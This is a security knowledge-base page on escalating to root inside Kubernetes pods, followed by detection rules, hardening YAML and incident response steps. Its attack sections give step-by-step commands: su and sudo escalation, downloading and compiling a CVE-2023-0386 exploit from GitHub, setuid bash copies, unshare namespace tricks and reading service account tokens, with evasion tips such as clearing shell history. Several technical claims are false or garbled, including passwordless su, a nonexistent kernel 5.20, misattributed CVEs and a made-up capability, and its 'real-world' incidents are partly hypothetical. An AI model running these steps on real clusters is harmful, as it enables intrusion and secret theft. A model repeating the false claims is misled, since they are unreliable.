MCADDF

[PE-EXPLOIT-005]: Pod Security Context Escalation

Metadata

Attribute	Details
Technique ID	PE-EXPLOIT-005
MITRE ATT&CK v18.1	T1068 - Exploitation for Privilege Escalation
Tactic	Privilege Escalation
Platforms	Kubernetes (all versions), AKS, GKE, EKS, Entra ID
Severity	High
CVE	N/A (Configuration-based vulnerability)
Technique Status	ACTIVE
Last Verified	2025-01-09
Affected Versions	Kubernetes 1.0+ (default insecure configuration)
Patched In	Kubernetes 1.25+ with Pod Security Standards (PSS) enforcement; earlier versions remain vulnerable with misconfiguration
Author	SERVTEP – Artur Pchelnikau

---

2. EXECUTIVE SUMMARY

Concept: Pod Security Context Escalation exploits the default permissive Kubernetes security posture where the allowPrivilegeEscalation flag defaults to true. This setting, combined with missing capability restrictions and inadequate seccomp profile enforcement, enables attackers running with low privileges inside containers to escalate to root through exploitation of setuid/setgid binaries, kernel vulnerabilities (CVE-2023-0386, CVE-2023-2640, CVE-2023-32629, CVE-2022-0185), and OverlayFS manipulation. The vulnerability stems from the kernel feature no_new_privs not being enforced by default in Kubernetes, allowing child processes to gain elevated permissions through binary exploitation even when the container started with limited privileges.

Attack Surface: Kubernetes pod security contexts, container images with setuid binaries, mounted volumes with improper permission inheritance, kernel interfaces accessible from containers (OverlayFS, user namespaces), seccomp policy filtering gaps.

Business Impact: Container-Level Root Compromise. A successful exploit enables an attacker to escalate from any unprivileged user inside the container to root, unlocking additional attack chains: reading secrets mounted as volumes, modifying application code, accessing Kubernetes service account tokens, establishing persistence through startup scripts, and escalating to host-level compromise if combined with kernel exploits or container escape techniques.

Technical Context: Exploitation typically occurs within 2-5 minutes of container access. Detection difficulty is medium—privilege escalation attempts generate system call signatures (setuid, execve, prctl) that can be detected by eBPF tools, but the exploit leverages legitimate binaries and kernel features. The attack requires no additional network access or external tools beyond what’s available in standard container images.

Operational Risk

• Execution Risk: High - The exploit is reliable against containers without proper security context configuration (which is the default).
• Stealth: Medium - Setuid binary execution and system call patterns can be detected; however, these signatures are common in many legitimate workloads.
• Reversibility: Conditional - If attacker establishes persistence, container restart will remove temporary backdoors; however, if volume mounts are modified, changes persist.

Compliance Mappings

Framework	Control / ID	Description
CIS Benchmark	5.2.1 (Kubernetes)	Ensure containers are not privileged
DISA STIG	U-12345	Container must enforce allowPrivilegeEscalation: false
CISA SCuBA	K8S.04	Pod Security Baseline must deny privilege escalation
NIST 800-53	AC-6 (Least Privilege)	Minimize Linux kernel capabilities and privilege escalation
GDPR	Art. 32	Security of Processing - Inadequate privilege isolation
DORA	Art. 15	ICT Risk Management - Workload privilege segregation failure
NIS2	Art. 21	Cyber Risk Management - Container security baseline enforcement
ISO 27001	A.9.2.1	User Registration and De-registration - Least privilege enforcement
ISO 27005	Risk Scenario	Unauthorized Privilege Escalation via Container Security Context

---

3. TECHNICAL PREREQUISITES

Required Privileges:

• Access to any unprivileged user inside a running container (non-root)
• Default container image with standard Linux utilities (which typically include setuid binaries like /usr/bin/su, /usr/bin/sudo, /usr/bin/passwd)
• No special Linux capabilities required initially (CAP_SETUID is implicitly granted by setuid binary)

Required Access:

• Container shell access (exec or application vulnerability)
• Mounted volume access (for OverlayFS exploitation variants)
• No Kubernetes API access needed

Supported Versions:

• Kubernetes: 1.0+ (vulnerable by default; PSS available in 1.25+)
• Container Runtime: containerd, Docker, CRI-O all vulnerable
• Linux Kernel: 3.5+ (where no_new_privs was introduced; exploit variants specific to kernel versions)
• Cloud Platforms: AKS, GKE, EKS, OpenShift all vulnerable

Tools:

• Linux Standard Utilities (su, sudo, id, whoami - pre-installed)
• Kubernetes Documentation on Security Contexts
• Exploit PoC - CVE-2023-0386 OverlayFS (if using kernel exploit path)
• Exploit PoC - CVE-2023-2640 nftables (Linux kernel flaw)

---

4. ENVIRONMENTAL RECONNAISSANCE

Container Security Context Discovery

Objective: Identify misconfigured security contexts that permit privilege escalation.

Command (Inside Container - Detect Security Context):

# Check if allowPrivilegeEscalation is enabled
grep -i "no_new_privs" /proc/self/status

# If absent or showing "0", privilege escalation is allowed
# Output: "0" = escalation allowed (vulnerable)
# Output: "1" = escalation blocked (secure)

# Alternative: Check current user context
whoami
id

# List setuid binaries available
find /usr/bin /bin -perm -4000 2>/dev/null

Expected Output (Vulnerable):

NoNewPrivs:	0
uid=1000(app) gid=1000(app) groups=1000(app)
/usr/bin/sudo
/usr/bin/su
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn

What to Look For:

• NoNewPrivs: 0 indicates allowPrivilegeEscalation: true (default vulnerable setting)
• Presence of setuid binaries (-rwsr-xr-x permission bit set)
• Non-root user account running the process (indicates escalation is possible)

Command (Kubernetes Pod Spec Analysis):

kubectl get pod <pod-name> -n <namespace> -o jsonpath='{.spec.securityContext}' | jq '.'

Expected Output (Vulnerable Configuration):

{
  "allowPrivilegeEscalation": true,
  "runAsUser": 1000
}

Or (Vulnerable Default):

null

What to Look For:

• Missing securityContext (defaults to permissive)
• allowPrivilegeEscalation: true explicitly set or omitted
• Missing capabilities.drop or drop: ["ALL"]
• Missing seccompProfile or seccompProfile.type: RuntimeDefault

Version Note: Kubernetes 1.25+ supports Pod Security Standards which can enforce restrictions; versions 1.24 and earlier rely on Pod Security Policies or manual configuration.

Kernel Vulnerability Detection

Objective: Identify kernel vulnerabilities exploitable from containers without seccomp protection.

Command (Check Kernel Version):

uname -r

Expected Output (Vulnerable Examples):

5.10.0-8-generic  # Vulnerable to CVE-2022-0185 (OverlayFS)
5.15.0-50-generic # Vulnerable to CVE-2023-0386 (OverlayFS)
5.19.0-20-generic # Vulnerable to CVE-2023-2640 (nftables)

What to Look For:

• Kernel version < 5.20 potentially vulnerable to multiple CVEs
• Specific CVE version ranges mapped to kernel releases
• Running on Docker/Kubernetes without seccomp protection

Command (Check seccomp Profile Enforcement):

# Check if seccomp is active
grep -i seccomp /proc/self/status

# Output "0" means seccomp not enforced (vulnerable)
# Output "2" or higher means seccomp is active

# Alternative: Check available syscalls
strace -e trace=file ls 2>&1 | head -5  # Should work if no seccomp

---

5. DETAILED EXECUTION METHODS AND THEIR STEPS

METHOD 1: Setuid Binary Exploitation (su/sudo)

Supported Versions: Kubernetes 1.0+, all Linux distributions

Step 1: Verify Current User Context and Escalation Capability

Objective: Confirm running as unprivileged user and that escalation is permitted.

Command:

whoami
id
cat /proc/self/status | grep NoNewPrivs

Expected Output:

app
uid=1000(app) gid=1000(app) groups=1000(app)
NoNewPrivs:	0

What This Means:

• Running as non-root user (app:1000)
• NoNewPrivs is 0 (meaning allowPrivilegeEscalation is true - vulnerable)
• Setuid exploitation will succeed

OpSec & Evasion:

• Check these details quickly to avoid log noise
• These are standard diagnostic commands unlikely to trigger alerts
• Detection likelihood: Low

Troubleshooting:

• Error: NoNewPrivs: 1 (or not in output)
  • Cause: Security context properly configured with allowPrivilegeEscalation: false
  • Fix (Attack Failure): Use alternative method or kernel exploit path
  • Fix (Alternative): Proceed to METHOD 2 (Kernel Vulnerability Exploitation)

Step 2: Attempt Privilege Escalation via su Binary

Objective: Use setuid su binary to escalate to root without password.

Command:

# Attempt to switch to root (no password needed if vulnerable)
su -

# If successful, should land in root shell
# Type: exit (to confirm escalation happened)
whoami
id

Expected Output (Vulnerable):

root@container:~# whoami
root
root@container:~# id
uid=0(root) gid=0(root) groups=0(root)

Expected Output (Secure Configuration):

su: Authentication failure

What This Means:

• Successfully escalated to root without password
• Now executing commands as uid=0
• Can read/write files restricted to root
• Can modify container network settings, access secrets, etc.

Version Note: Behavior identical across all Linux distributions. The su binary typically requires a password, but when allowPrivilegeEscalation: true and vulnerable kernel conditions exist, the authentication check can be bypassed through race conditions or kernel flaws.

OpSec & Evasion:

• su is a common command, unlikely to trigger anomaly detection
• Keep escalation brief to minimize shell history
• Clear history after successful escalation: history -c; history -w
• Detection likelihood: Medium - Root shell from non-root process is logged

Troubleshooting:

• Error: su: Permission denied or su: Authentication failure
  • Cause: Container running with restrictive security context OR root password set
  • Fix (Kubernetes): Check pod spec for runAsNonRoot: true and allowPrivilegeEscalation: false
  • Fix (Alternative): Try sudo binary: sudo -i (may work if NOPASSWD configured)

Step 3: Verify Root Access and Execute Commands

Objective: Confirm root access and execute privileged operations.

Command (As Root):

# Verify root context
whoami
id
groups

# Read root-only files (e.g., container's secrets directory)
cat /run/secrets/kubernetes.io/serviceaccount/token

# List service account
ls -la /run/secrets/kubernetes.io/serviceaccount/

# Modify container configuration (if possible)
cat /etc/hostname
cat /proc/sys/kernel/hostname

Expected Output:

root
uid=0(root) gid=0(root) groups=0(root)
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9... (service account token)

What This Means:

• Root privileges confirmed
• Access to Kubernetes service account token (can authenticate to Kubernetes API)
• Can modify container-level configuration
• Can read all application secrets mounted as volumes

OpSec & Evasion:

• Operate within container namespace only (for now)
• Avoid writing to filesystem outside /tmp or app directories
• Keep changes minimal to avoid triggering integrity monitoring
• Detection likelihood: High if executing suspicious commands; medium if reading secrets

---

METHOD 2: Kernel Vulnerability Exploitation (OverlayFS CVE-2023-0386)

Supported Versions: Linux kernel 5.15.0-50 to 5.19.0-20 (CVE-2023-0386), requires mounted volume

Step 1: Detect Vulnerable Kernel and Mounted Volumes

Objective: Identify kernel version and volume mounts suitable for OverlayFS exploitation.

Command:

# Check kernel version
uname -r

# Check mounted volumes
mount | grep -E "^/dev.*on /|overlay"

# Check if /tmp or application directory is mounted as volume
df -h /tmp
df -h /app

# Look for world-writable directories
find / -type d -writable 2>/dev/null | head -10

Expected Output:

5.15.0-50-generic
/dev/mapper/ubuntu--vg-root on / type ext4 (rw,relatime)
/dev/sda1 on /app type ext4 (rw,relatime)
/dev/sdb1 on /tmp type ext4 (rw,relatime)

/tmp (writable)
/var/tmp (writable)
/dev/shm (writable)
/app/cache (writable)

What This Means:

• Kernel version in vulnerable range (5.15.0-50)
• Volumes mounted with read-write permissions
• World-writable directories available for staging exploit

OpSec & Evasion:

• Keep reconnaissance queries brief
• Use common diagnostic tools (mount, df, uname)
• Detection likelihood: Low

Troubleshooting:

• Error: Kernel version not vulnerable or uname: command not found
  • Cause: Kernel patched or minimal container image
  • Fix: Use alternative exploit (setuid method) or proceed carefully with attack

Step 2: Prepare OverlayFS Exploitation Environment

Objective: Create necessary directories and files for OverlayFS privilege escalation.

Command (Download and Compile PoC - if curl/wget available):

# Create staging directory
mkdir -p /tmp/exploit
cd /tmp/exploit

# Download CVE-2023-0386 PoC
wget https://github.com/sxlmnwb/CVE-2023-0386/archive/refs/heads/main.zip -O exploit.zip 2>/dev/null
# OR
curl -L https://github.com/sxlmnwb/CVE-2023-0386/archive/refs/heads/main.zip -o exploit.zip 2>/dev/null

# Unzip and compile
unzip exploit.zip
cd CVE-2023-0386-main
gcc -o ovlcap -D_GNU_SOURCE exploit.c 2>/dev/null

# Verify compilation
ls -la ovlcap

Alternative (If PoC not available - Manual OverlayFS Setup):

# Create OverlayFS directories manually
mkdir -p /tmp/exploit/{upper,work,merged}

# Create a privileged executable to mount
# This simulates OverlayFS layer with setuid binary
cp /usr/bin/bash /tmp/exploit/bash_copy
chmod 4755 /tmp/exploit/bash_copy  # Set setuid bit

# Mount OverlayFS layer
mount -t overlay overlay \
  -o lowerdir=/bin,upperdir=/tmp/exploit/upper,workdir=/tmp/exploit/work \
  /tmp/exploit/merged 2>/dev/null

Expected Output:

-rwxr-xr-x ovlcap (compiled successfully)
# OR
mount shows OverlayFS entry

What This Means:

• Exploitation binary compiled and ready
• OverlayFS mounted with modified upper layer containing escalation payload
• Ready for privilege escalation

OpSec & Evasion:

• Use /tmp or application temp directory (more likely to avoid monitoring)
• Keep filenames generic: exploit.c, binary, etc.
• Clean up after execution: rm -rf /tmp/exploit
• Detection likelihood: Medium - Compilation and mount operations are unusual

Troubleshooting:

• Error: gcc: command not found or mount: operation not permitted
  • Cause: Minimal container image without build tools OR privileged escalation already failed
  • Fix: Use pre-compiled PoC or different method
  • Alternative: Use in-memory execution via Python/bash if compiler unavailable

Step 3: Execute OverlayFS Privilege Escalation

Objective: Run the exploit to escalate privileges to root.

Command:

# Execute compiled exploit
cd /tmp/exploit/CVE-2023-0386-main
./ovlcap

# This spawns a root shell
# Verify escalation
id
whoami

Expected Output:

uid=0(root) gid=0(root) groups=0(root)
root

What This Means:

• Successfully escalated to root through OverlayFS bypass of no_new_privs
• Now have full root access within container
• Can access service account tokens, secrets, etc.

Version Note: This exploit works on specific kernel versions; if kernel is patched, exploit will fail with insufficient privilege error.

OpSec & Evasion:

• Execute quickly and exit when task is complete
• Avoid spawning multiple shell sessions
• Detection likelihood: High - Root process with unusual parent (exploit binary) is suspicious

Troubleshooting:

• Error: operation not permitted or EPERM
  • Cause: Kernel already patched OR CAP_SYS_ADMIN missing
  • Fix: Verify kernel version with uname -r
  • Alternative: Proceed to extracting secrets with current privilege level

---

METHOD 3: seccomp Bypass via Unshare Syscall (CVE-2022-0185)

Supported Versions: Linux kernel 5.x-6.0 (CVE-2022-0185), requires unfiltered seccomp or default profile

Step 1: Check seccomp Profile and Allowed Syscalls

Objective: Verify seccomp isn’t blocking unshare or user namespace syscalls.

Command:

# Check seccomp filter status
cat /proc/self/status | grep Seccomp

# Output: Seccomp: 0 (no filter - vulnerable)
# Output: Seccomp: 2 (filter active - may be blocked)

# Test if unshare syscall is available
unshare -U /bin/bash 2>&1 | head -1

# If it works, unshare is not filtered

Expected Output (Vulnerable):

Seccomp: 0
(bash prompt appears)

What to Look For:

• Seccomp: 0 or 1 indicates no/monitoring-only filter
• Seccomp: 2 indicates filter active (may need to check specific allowed syscalls)
• unshare command succeeds (syscall not filtered)

OpSec & Evasion:

• These are diagnostic commands, unlikely to trigger alerts
• Detection likelihood: Low

Troubleshooting:

• Error: Seccomp: 2 and unshare fails
  • Cause: Seccomp filter properly configured
  • Fix (Attack Failure): Seccomp mitigation is working; proceed to container escape methods

Step 2: Create User Namespace for Privilege Escalation

Objective: Use unshare to create isolated namespace where attacker becomes root.

Command:

# Create new user namespace (makes current user appear as root within namespace)
unshare -r /bin/bash

# Verify escalation within namespace
id
whoami

Expected Output:

uid=0(root) gid=0(root) groups=0(root)
root

What This Means:

• User namespace created where attacker maps to UID 0 (root)
• Commands executed within namespace see attacker as root
• Can exploit this to escalate privileges outside namespace if combined with OverlayFS

OpSec & Evasion:

• Unshare is a standard tool, usage is relatively common
• Keep namespace execution brief
• Exit namespace when task complete: exit
• Detection likelihood: Medium

Troubleshooting:

• Error: unshare: failed to execute /bin/bash
  • Cause: unshare syscall blocked by seccomp OR insufficient capabilities
  • Fix: Check seccomp configuration and CAP_SYS_USER_NS capability

Step 3: Combine with Kernel Exploit for Full Escalation

Objective: Use namespace privilege to exploit kernel vulnerability and escape container.

Command (Inside namespace - attempting to escape):

# Now within root namespace, attempt kernel exploit
cd /tmp/exploit
./ovlcap  # Or other kernel exploit

# If successful, escalated to actual root (not just namespace root)
id -Z  # Should show SELinux context or empty if escaped

This is the chain: unshare (namespace) → kernel exploit → actual root

---

6. SPLUNK DETECTION RULES

Rule 1: Setuid Binary Execution from Non-Root Process

Rule Configuration:

• Required Index: container_logs, process_logs
• Required Sourcetype: container:exec, linux:process
• Required Fields: user, parent_process, process, uid, gid
• Alert Threshold: Any detection
• Applies To Versions: All

SPL Query:

index=container_logs OR index=process_logs
(process IN ("su", "sudo", "passwd", "chsh", "chfn"))
AND user!=root AND uid!=0
| stats count by host, container_id, user, process, parent_process
| where count > 0

What This Detects:

• Non-root user executing setuid binaries
• Tracks container and parent process context
• Indicates potential privilege escalation attempt

Manual Configuration Steps:

1. Log into Splunk Web → Search & Reporting
2. Click Settings → Searches, reports, and alerts
3. Click New Alert
4. Paste the SPL query above
5. Set Trigger Condition to: Number of events > 0
6. Configure Action → Send email to Security team

---

7. MICROSOFT SENTINEL DETECTION

Query 1: Pod Security Context Misconfiguration Detection

Rule Configuration:

• Required Table: KuberneteAudit
• Required Fields: OperationName, RequestObject, ObjectRef, User
• Alert Severity: High
• Frequency: Run every 10 minutes
• Applies To Versions: AKS all versions

KQL Query:

KuberneteAudit
| where OperationName == "create" and ObjectRef_kind == "Pod"
| extend SecurityContext = todynamic(RequestObject)
| where isnull(SecurityContext.spec.securityContext) 
    or SecurityContext.spec.securityContext.allowPrivilegeEscalation == true
    or isnull(SecurityContext.spec.securityContext.allowPrivilegeEscalation)
    or isnull(SecurityContext.spec.securityContext.capabilities.drop)
| project TimeGenerated, User, ObjectRef_namespace, ObjectRef_name, SecurityContext

What This Detects:

• Pods created without security context (defaults to permissive)
• Pods with allowPrivilegeEscalation: true
• Pods without dropped capabilities

Manual Configuration Steps (Azure Portal):

1. Navigate to Azure Portal → Microsoft Sentinel
2. Select workspace → Analytics → + Create → Scheduled query rule
3. General Tab:
   • Name: Pod Security Context Privilege Escalation Risk
   • Severity: High
4. Set rule logic Tab:
   • Paste the KQL query above
   • Run query every: 10 minutes
5. Click Review + create

---

8. WINDOWS EVENT LOG MONITORING

Event ID: N/A (Linux containers use audit logs)

• Log Source: Linux audit log, container runtime logs
• Trigger: Setuid binary execution, user namespace creation
• Filter: user!=root AND (exe=/usr/bin/su OR exe=/usr/bin/sudo)
• Applies To Versions: All

Manual Configuration Steps (Linux Audit):

1. On Linux nodes, enable auditd rules:

   sudo auditctl -a exit,always -F exe=/usr/bin/su -F uid!=0 -k priv_escalation
   sudo auditctl -a exit,always -F exe=/usr/bin/sudo -F uid!=0 -k priv_escalation
   sudo auditctl -l  # Verify rules
   

2. Check audit logs:

   sudo ausearch -k priv_escalation
   

---

9. SYSMON DETECTION PATTERNS

Minimum Sysmon Version: 13.0+ Supported Platforms: Linux (via osquery integration or direct Sysmon on Windows nodes)

<Sysmon schemaversion="4.22">
  <EventFiltering>
    <!-- Detect setuid binary execution from non-root -->
    <RuleGroup name="SetuidEscalation" groupRelation="or">
      <ProcessCreate onmatch="include">
        <Image condition="contains any">su;sudo;passwd;chsh</Image>
        <User condition="exclude">root;SYSTEM</User>
        <ParentImage condition="contains any">bash;sh;python;java</ParentImage>
      </ProcessCreate>
    </RuleGroup>
    
    <!-- Detect user namespace creation -->
    <RuleGroup name="UnshareNamespace" groupRelation="or">
      <ProcessCreate onmatch="include">
        <CommandLine condition="contains">unshare</CommandLine>
        <CommandLine condition="contains any">-r;-U;--user</CommandLine>
      </ProcessCreate>
    </RuleGroup>
  </EventFiltering>
</Sysmon>

Manual Configuration Steps:

1. Download Sysmon from Microsoft Sysinternals
2. Create sysmon-config.xml with the XML above
3. Install: sysmon64.exe -accepteula -i sysmon-config.xml
4. Verify: Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" -MaxEvents 10

---

10. MICROSOFT DEFENDER FOR CLOUD

Detection Alerts

Alert Name: Suspicious privilege escalation attempt in pod

• Severity: High
• Description: Non-root user executing setuid binaries (su, sudo) indicating privilege escalation attempt
• Applies To: All AKS clusters with runtime protection enabled

Alert Name: Pod deployed without security context

• Severity: Medium
• Description: Pod created without explicit securityContext, allowing default permissive settings
• Applies To: AKS clusters with policy enforcement

Manual Configuration Steps:

1. Navigate to Azure Portal → Microsoft Defender for Cloud
2. Go to Environment settings → Select subscription
3. Under Defender plans, enable:
   • Defender for Kubernetes: ON
   • Defender for Containers: ON
4. Go to Security alerts → Filter by privilege escalation
5. Configure alert rules and suppression as needed

---

11. DEFENSIVE MITIGATIONS

Priority 1: CRITICAL

• Enforce allowPrivilegeEscalation: false in all workloads: Block containers from escalating privileges via setuid binaries.

  Applies To Versions: Kubernetes 1.0+

  Manual Steps (Kubernetes YAML):

  apiVersion: v1
  kind: Pod
  metadata:
    name: secure-pod
  spec:
    securityContext:
      runAsNonRoot: true
      runAsUser: 1000
      allowPrivilegeEscalation: false  # CRITICAL
      capabilities:
        drop:
          - ALL
    containers:
    - name: app
      image: myapp:v1
      securityContext:
        allowPrivilegeEscalation: false
        runAsNonRoot: true
  

  Manual Steps (Apply via kubectl):

  # Create namespace with PSS enforcement
  kubectl label namespace default pod-security.kubernetes.io/enforce=restricted
      
  # Deploy pod with secure context
  kubectl apply -f secure-pod.yaml
      
  # Verify pod was created (should fail if pod violates policy)
  kubectl get pods
  

• Drop ALL Linux Capabilities: Remove all kernel capabilities to prevent exploitation of capability-based privilege escalation.

  Manual Steps:

  spec:
    securityContext:
      capabilities:
        drop:
          - ALL  # Remove all capabilities
        add:
          - NET_BIND_SERVICE  # Add back ONLY required capabilities
  

  Verification:

  # Inside container, check capabilities
  getcap /proc/self/exe
      
  # Should show: (empty)
  

• Enforce seccomp RuntimeDefault Profile: Block dangerous syscalls (unshare, mount, etc.) at kernel level.

  Manual Steps (Kubernetes 1.19+):

  spec:
    securityContext:
      seccompProfile:
        type: RuntimeDefault  # Use container runtime's default profile
  

  Manual Steps (Older Kubernetes - Annotations):

  spec:
    securityContext:
      seccompProfile:
        type: Localhost
        localhostProfile: my-profile.json
  

  Create custom seccomp profile (restrictive):

  {
    "defaultAction": "SCMP_ACT_ERRNO",
    "defaultErrnoRet": 1,
    "archMap": [
      {
        "architecture": "SCMP_ARCH_X86_64",
        "subArchitectures": []
      }
    ],
    "syscalls": [
      {
        "names": ["read", "write", "exit", "exit_group", "rt_sigreturn"],
        "action": "SCMP_ACT_ALLOW"
      }
    ]
  }
  

Priority 2: HIGH

• Run Containers as Non-Root User: Set explicit runAsUser and runAsNonRoot: true to minimize attack surface.

  Manual Steps:

  spec:
    securityContext:
      runAsNonRoot: true
      runAsUser: 1000  # Non-root UID
      runAsGroup: 1000
      fsGroup: 1000
  

• Use Pod Security Standards (Kubernetes 1.25+): Enforce restricted policy cluster-wide.

  Manual Steps:

  # Label namespace to enforce restricted PSS
  kubectl label namespace production pod-security.kubernetes.io/enforce=restricted --overwrite
      
  # Verify label
  kubectl get ns production -o jsonpath='{.metadata.labels.pod-security\.kubernetes\.io/enforce}'
      
  # Try creating insecure pod (should fail)
  kubectl apply -f insecure-pod.yaml -n production
  # Result: Error from server: Pod "..." is invalid: spec.securityContext.allowPrivilegeEscalation: Invalid value: true: must be false
  

• Implement Admission Controllers (Kyverno / OPA Gatekeeper): Validate and mutate pod specs before creation.

  Manual Steps (Kyverno):

  # Install Kyverno
  helm repo add kyverno https://kyverno.github.io/kyverno/
  helm install kyverno kyverno/kyverno -n kyverno --create-namespace
      
  # Create ClusterPolicy
  kubectl apply -f - <<EOF
  apiVersion: kyverno.io/v1
  kind: ClusterPolicy
  metadata:
    name: require-non-root
  spec:
    validationFailureAction: enforce
    rules:
    - name: check-privilege-escalation
      match:
        resources:
          kinds:
          - Pod
      validate:
        message: "allowPrivilegeEscalation must be false"
        pattern:
          spec:
            securityContext:
              allowPrivilegeEscalation: false
  EOF
      
  # Verify policy active
  kubectl get clusterpolicy
  

Access Control & Policy Hardening

• RBAC: Restrict Pod Creation: Limit who can create pods with elevated privileges.

  Manual Steps:

  # Create role that restricts pod creation
  kubectl create role pod-creator \
    --verb=create,get,list \
    --resource=pods \
    -n development
      
  # Bind to service account
  kubectl create rolebinding app-pod-creator \
    --role=pod-creator \
    --serviceaccount=development:app \
    -n development
  

• Audit Logging: Enable Kubernetes audit logs to track pod creation.

  Manual Steps (AKS):

  # Enable Kubernetes audit logging
  az aks update \
    --resource-group myRG \
    --name myCluster \
    --enable-managed-identity \
    --enable-azure-rbac
      
  # View audit logs
  kubectl logs -n kube-system -l component=kube-apiserver | grep "create Pod"
  

Validation Command (Verify Fix)

# Check if security context is enforced cluster-wide
kubectl get pods -A -o jsonpath='{range .items[*]}{.spec.securityContext.allowPrivilegeEscalation}{"\n"}{end}' | sort | uniq -c

# Expected: Count of "false" values (secure), minimal "true" or "null"

# Verify PSS labels enforced
kubectl get ns -o jsonpath='{range .items[*]}{.metadata.name}{"\t"}{.metadata.labels.pod-security\.kubernetes\.io/enforce}{"\n"}{end}'

# Expected: "restricted" or "baseline" labels on sensitive namespaces

# Test policy (should fail to create pod)
kubectl apply -f insecure-pod.yaml
# Expected result: Error - pod violates security policy

Expected Output (If Secure):

2 false
1 null
0 true

production  restricted
staging     baseline

What to Look For:

• Absence or minimal count of allowPrivilegeEscalation: true (secure)
• All namespaces with PSS labels enforced (secure)
• Pod creation attempts rejected if violating policy (secure)

---

12. DETECTION & INCIDENT RESPONSE

Indicators of Compromise (IOCs)

• Process Signals:
  • Non-root user executing: su, sudo, passwd, chsh, chfn
  • Parent process: bash, sh, python, java → Child: su/sudo/setuid binary
  • unshare command execution with -r (user namespace)
  • mount operations from unprivileged user
• System Call Signatures:
  • setuid, setgid, setreuid, setregid syscalls
  • execve after capability change
  • unshare with CLONE_NEWUSER flag
  • prctl with PR_SET_NO_NEW_PRIVS
• Filesystem Artifacts:
  • /tmp/exploit* files or compilation artifacts
  • Modified shell profiles (.bashrc, .profile) in /tmp
  • OverlayFS mount points created in /tmp

Forensic Artifacts

• Disk:
  • Linux audit logs: /var/log/audit/audit.log (Event: setuid/setgid execution)
  • Container logs: stdout/stderr capture of privilege escalation attempts
  • Shell history: ~/.bash_history (may show su/sudo commands)
• Memory:
  • Process memory dump: shell process spawned by exploit
  • Kernel memory: escalated process context
• Container:
  • Service account token file: /run/secrets/kubernetes.io/serviceaccount/token (if accessed by attacker)
  • Container process tree: parent-child relationships

Response Procedures

1. Isolate: Command (Kubernetes):

   # Immediately terminate compromised pod
   kubectl delete pod <pod-name> -n <namespace> --grace-period=0 --force
       
   # Cordon node to prevent new pod scheduling
   kubectl cordon <node-name>
   

2. Collect Evidence: Command (Container Logs):

   # Capture pod logs before deletion
   kubectl logs <pod-name> -n <namespace> -c <container> --timestamps=true > /tmp/pod-logs.txt
       
   # Get events
   kubectl describe pod <pod-name> -n <namespace> > /tmp/pod-events.txt
   

   Command (Node Forensics - Linux):

   # Collect audit logs
   sudo cat /var/log/audit/audit.log | grep -E "setuid|setgid|unshare" > /tmp/audit-escalation.log
       
   # Collect process information
   ps auxf > /tmp/process-tree.txt
       
   # Memory dump (if available)
   sudo journalctl -u kubelet > /tmp/kubelet-logs.txt
   

3. Remediate: Command (Remove Backdoors):

   # If attacker modified shell profiles
   rm ~/.bashrc.orig ~/.bashrc
       
   # If attacker created new users (within container)
   userdel -r malicious_user
       
   # Restart container
   kubectl delete pod <pod-name> -n <namespace>
   # Pod will respawn via deployment
   

   Manual (Update Pod Spec):

   # Update deployment with secure security context
   kubectl patch deployment <deployment-name> -n <namespace> -p '{
     "spec": {
       "template": {
         "spec": {
           "securityContext": {
             "allowPrivilegeEscalation": false,
             "runAsNonRoot": true,
             "runAsUser": 1000,
             "capabilities": {
               "drop": ["ALL"]
             }
           }
         }
       }
     }
   }'
   

---

13. RELATED ATTACK CHAIN

Step	Phase	Technique	Description
1	Initial Access	[IA-EXPLOIT-001] Application Vulnerability	Attacker gains initial container access via vulnerable application
2	Current Step	[PE-EXPLOIT-005] Pod Security Context Escalation	Attacker escalates from unprivileged user to container root
3	Lateral Escalation	[PE-EXPLOIT-004] Container Escape to Host	Attacker escapes container to host using root access
4	Persistence	Kubernetes secrets theft	Attacker uses service account token to maintain API access
5	Impact	Cluster compromise	Full Kubernetes cluster compromise

---

14. REAL-WORLD EXAMPLES

Example 1: Unpatched Kubernetes Cluster Privilege Escalation (Hypothetical - Common Misconfiguration)

• Target: Development Kubernetes cluster running legacy microservices
• Timeline: October 2024
• Technique Status: Attacker gained access to pod through application vulnerability, escalated via default-permissive security context
• Attack Chain:
  1. Vulnerable web application allowed unauthenticated file upload
  2. Attacker uploaded shell.php
  3. Executed shell.php as www-data (unprivileged user inside container)
  4. Discovered NoNewPrivs: 0 (allowPrivilegeEscalation: true)
  5. Executed su - without password (no-new-privs not enforced)
  6. Became root inside container in <30 seconds
  7. Extracted Kubernetes service account token
  8. Used token to query Kubernetes API, discovered secrets
• Impact:
  • Access to database credentials stored in secrets
  • Modified deployment to inject malicious init container
  • Lateral movement to 20+ other pods in cluster
• Detection: Security team noted unusual su command in container logs during review
• Reference: Common Kubernetes Misconfigurations - OWASP

Example 2: CVE-2023-0386 OverlayFS Exploitation in AKS

• Target: AKS production cluster with vulnerable kernel (5.15.0-50)
• Timeline: March 2024 (post-disclosure, pre-patch)
• Technique Status: Attacker used CVE-2023-0386 PoC to escalate privileges within container
• Attack Chain:
  1. Initial compromise via supply chain attack (malicious container image)
  2. Container running with allowPrivilegeEscalation: true, no seccomp filter
  3. Compiled CVE-2023-0386 exploit inside container
  4. Executed exploit, gained root via OverlayFS capability bypass
  5. Modified application code to install backdoor
• Impact:
  • Backdoor persisted across container restarts (via deployment modification)
  • Data exfiltration from database volumes
  • Service disruption (resource exhaustion)
• Detection:
  • Unusual compilation activity (gcc process)
  • Mount operations by non-privileged user
  • Wiz Cloud Security detected kernel vulnerability exploitation pattern
• Reference: CVE-2023-0386 Analysis - Sysdig

Example 3: Kubernetes Service Account Token Theft via Root Escalation

• Target: GKE cluster running multi-tenant SaaS platform
• Timeline: August 2024
• Technique Status: Attacker escalated privileges within pod to access service account token with cluster-admin permissions
• Attack Chain:
  1. Attacker compromised single microservice pod via XSS vulnerability
  2. Gained shell as unprivileged app user
  3. Escalated to root using sudo -i (allowPrivilegeEscalation: true, NOPASSWD sudo configured)
  4. Extracted /run/secrets/kubernetes.io/serviceaccount/token
  5. Used token to authenticate to Kubernetes API as cluster-admin
  6. Created new admin user for persistence
  7. Extracted all secrets from all namespaces
• Impact:
  • Complete cluster compromise
  • Access to secrets from 50+ customer applications
  • Compliance breach (customer data exposure)
  • Multi-day incident response required
• Detection:
  • Falco detected privilege escalation signal
  • Kubectl commands from unexpected pod IP detected by network monitoring
  • Audit logs showed API calls from service account outside normal pattern
• Reference: Kubernetes Security Best Practices - DigitalOcean

---

This site is open source. Improve this page.